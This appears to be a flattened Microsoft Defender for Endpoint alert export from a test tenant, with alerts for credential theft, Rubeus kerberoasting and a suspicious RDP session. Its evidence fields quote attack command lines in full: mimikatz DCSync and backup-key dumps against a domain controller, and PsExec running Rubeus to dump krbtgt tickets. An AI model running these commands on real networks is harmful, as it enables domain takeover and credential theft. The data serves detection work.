"registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": "msdxv2-dc.msdxv2.m365dpoc.com", "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-11-18T05:13:00.6633333Z", "fileName": null, "filePath": null, "ipAddress": "10.0.0.10", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:13:00.6633333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit", "processCreationTime": "2022-11-18T05:09:59.0460935Z", "processId": 9332, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T10:45:35.0066667Z
Suspicious
None
hacker
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T05:11:31.4266667Z
Unknown
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
9,332
"mimikatz.exe" "lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt" exit
2022-11-18T05:09:59.0460935Z
4,976
2022-11-18T05:04:12.7150402Z
powershell.exe
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-20T12:55:53.1166667Z
Suspicious
None
steve
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1107
null
steve@msdxv8.m365dpoc.com
417911d0ed23fa27821fb50f094d994ed8fec8e4
34cb61ab7093580dd3ca4e4cbee00e1f55f8299f1e40b54a4a611f2a62566d79
msedge.exe
C:\Program Files (x86)\Microsoft\Edge\Application
10,512
powershell -enc ZABpAHIA
2022-12-20T12:52:33.7651136Z
9,792
2022-12-20T12:52:33.2640457Z
null
null
null
4f111b3b2366eacdcc66d7ad73548fff9b039c15
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:48:46.78Z
Suspicious
None
operator
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
b97761358338e640a31eef5e5c5773b633890914
57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4
PsExec.exe
C:\M365DAttack\PsTools
3,956
"PsExec.exe" \\msdxv8-win10b -accepteula cmd /c "C:\Temp\Rubeus.exe dump /service:krbtgt /user:steve > C:\Temp\AdminTicket.txt"
2022-12-22T08:47:29.7154534Z
6,584
2022-12-22T08:47:29.1097133Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
da638072963590599097_-155424872
4e390f1a-feee-4335-8b29-fbd8c684cae3
975
MicrosoftDefenderForEndpoint
2022-12-22T08:59:19.0599291Z
2022-12-22T08:59:19.6066667Z
null
2022-12-22T08:47:53.8045023Z
2022-12-22T08:47:53.8045023Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
New
High
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
null
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "rnd.local", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Inactive", "loggedOnUsers": [], "mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "High", "tags": [], "version": "1809", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:59:19.0966667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:59:19.0966667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 6324, "processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv8.m365dpoc.com /user:krbtgt\" exit", "processCreationTime": "2022-12-22T08:47:53.5760604Z", "processId": 6932, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T17:36:54.33Z
Suspicious
None
operator
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T04:44:35.99Z
Suspicious
None
Takeshi
vpn.zone
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T04:51:48.7833333Z
Suspicious
None
Takeshi
prod.env
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045930660064910_-1043423044
c82ef2f7-1b27-40a6-a43b-ce7a975623c2
765
MicrosoftDefenderForEndpoint
2022-11-21T02:04:26.0065203Z
2022-11-21T02:34:51.2166667Z
null
2022-11-21T02:02:28.8560243Z
2022-11-21T02:33:53.306249Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
New
High
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
null
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "lab.net", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:04:26.0433333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:04:26.0433333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit", "processCreationTime": "2022-11-21T02:02:27.0051694Z", "processId": 8844, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:08:07.0866667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit", "processCreationTime": "2022-11-21T02:06:53.5444799Z", "processId": 10200, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:13:43.88Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit", "processCreationTime": "2022-11-21T02:11:50.2848714Z", "processId": 2256, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:15:56.4766667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": null, "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit", "processCreationTime": "2022-11-21T02:15:09.28664Z", "processId": 11856, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:34:51.21Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"lsadump::backupkeys /system:msdxv2-dc.msdxv2.m365dpoc.com /export\" exit", "processCreationTime": "2022-11-21T02:33:53.1469628Z", "processId": 2044, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-19T02:34:25.7533333Z
Benign
None
jeff
null
S-1-5-21-2300221942-1987151257-321556088-1104
null
null
6cbce4a295c163791b60fc23d285e6d84f28ee4c
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
powershell.exe
7,228
powershell.exe -command " $Process = New-Object System.Diagnostics.Process; $Process.StartInfo.FileName = 'https://nam12.safelinks.protection.outlook.com/?url=http%3A%2F%2Fggegbcd.companyportal.cloud%2Faccb%2Fhbcbaefjanbegh&data=05%7C01%7Cjeff%40msdxv2.m365dpoc.com%7Cee62a5acae6648e2586608dac9cf3b8b%7C1a49212958c8401191cd245285f5345c%7C0%7C0%7C638044189166181002%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000%7C%7C%7C&sdata=vl4QrtOOlKwiHKzXx23XZ8qZlInU73CMdOSBq0EspY4%3D&reserved=0'; $Process.StartInfo.UseShellExecute = $true; $Process.Start() | Out-Null; "
2022-11-19T02:08:50.3807445Z
11,120
2022-11-19T02:08:50.3566833Z
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-22T08:48:24.5933333Z
Suspicious
None
jeff
evilcorp.cn
S-1-5-21-2159906967-4174806019-1002223092-1104
null
jeff@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T09:07:38.41Z
Malicious
None
null
null
null
null
null
null
null
null
null
0
0001-01-01T00:00:00Z
0
0001-01-01T00:00:00Z
null
null
null
null
da638072957109047022_-1951943437
7a218a68-6d11-49a4-82d9-c0310ab253ed
975
MicrosoftDefenderForEndpoint
2022-12-22T08:48:30.9047201Z
2022-12-22T08:48:31.6266667Z
null
2022-12-22T08:26:21.72798Z
2022-12-22T08:47:12.1411574Z
Suspicious RDP session
A combination of several suspicious RDP session activities has been detected in this device. Attackers might be attempting to establish a foothold in the environment by using various reconnaissance and persistence methods, then evade detection by tampering with and turning off security features to complete their objectives.
SuspiciousActivity
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
e3270960-77a9-4f2b-a6ba-ea6a9d5e86d8
null
null
null
[ "T1021.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com", "firstSeen": "2022-12-08T05:21:19.944Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV8" } ], "mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "Low", "tags": [], "version": "1809", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": "MSDXV8-Win10V$", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:48:30.9266667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": "S-1-5-18", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "MSDXV8", "entityType": "User", "evidenceCreationTime": "2022-12-22T08:48:30.9266667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Ip", "evidenceCreationTime": "2022-12-22T08:48:30.9266667Z", "fileName": null, "filePath": null, "ipAddress": "10.0.1.5", "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:48:30.9266667Z", "fileName": "explorer.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:26:23.9030784Z", "parentProcessFileName": "userinit.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 2796, "processCommandLine": "Explorer.EXE", "processCreationTime": "2022-12-22T08:26:24.0772409Z", "processId": 1896, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d", "sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b", "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1", "domainName": "MSDXV8", "entityType": "Process", "evidenceCreationTime": "2022-12-22T08:48:30.9266667Z", "fileName": "userinit.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-12-22T08:26:19.8141047Z", "parentProcessFileName": "winlogon.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 4656, "processCommandLine": "userinit.exe", "processCreationTime": "2022-12-22T08:26:23.9030784Z", "processId": 2796, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "470c3e60f9b2b6d83f95c7916a5361e34dec3471", "sha256": "1fe7f7c59ec7eaa276739fa85f7dda6136d81184e0aeb385b6ac9feaaa8c4394", "url": null, "userPrincipalName": "jeff@msdxv8.m365dpoc.com", "userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:42:39.37Z
Suspicious
None
admin
null
S-1-5-21-2300221942-1987151257-321556088-3104
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638001152856431388_-1818718794
20f880a8-51a8-4b79-97df-0c731c2c79d1
486
MicrosoftDefenderForEndpoint
2022-09-30T06:14:45.6431602Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:12:00.9075844Z
2022-09-30T06:12:00.9075844Z
Possible use of the Rubeus kerberoasting tool
Activity indicating the use of the Rubeus tool was observed on this endpoint. This tool can perform kerberoasting, pass-the-ticket, and other attack techniques that take advantage of Kerberos authentication. During these attacks, attackers often request Kerberos tickets for an account's service principal name (SPN). They then decrypt the tickets to get plaintext credentials associated with the account. Alternatively, they can perform the pass-the-ticket technique to authenticate directly without having to decrypt the obtained tickets.
SuspiciousActivity
Resolved
Medium
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
6606ef29-d293-4f24-a7c5-334dcb40b412
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1558.003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "prod.env", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:14:45.7033333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:14:45.7033333Z", "fileName": "PsExec.exe", "filePath": "C:\\M365DAttack\\PsTools", "ipAddress": null, "parentProcessCreationTime": "2022-09-30T06:11:59.5129511Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 9368, "processCommandLine": "\"PsExec.exe\" \\\\msdxv2-win10b -accepteula cmd /c \"C:\\Temp\\Rubeus.exe dump /service:krbtgt /user:steve > C:\\Temp\\AdminTicket.txt\"", "processCreationTime": "2022-09-30T06:12:00.7573565Z", "processId": 10400, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "b97761358338e640a31eef5e5c5773b633890914", "sha256": "57492d33b7c0755bb411b22d2dfdfdf088cbbfcd010e30dd8d425d5fe66adff4", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:14:45.7033333Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-09-30T06:11:59.3259132Z", "parentProcessFileName": "mimikatz.exe", "parentProcessFilePath": "C:\\M365DAttack\\Mimikatz\\x64", "parentProcessId": 7288, "processCommandLine": "powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1", "processCreationTime": "2022-09-30T06:11:59.5129511Z", "processId": 9368, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" 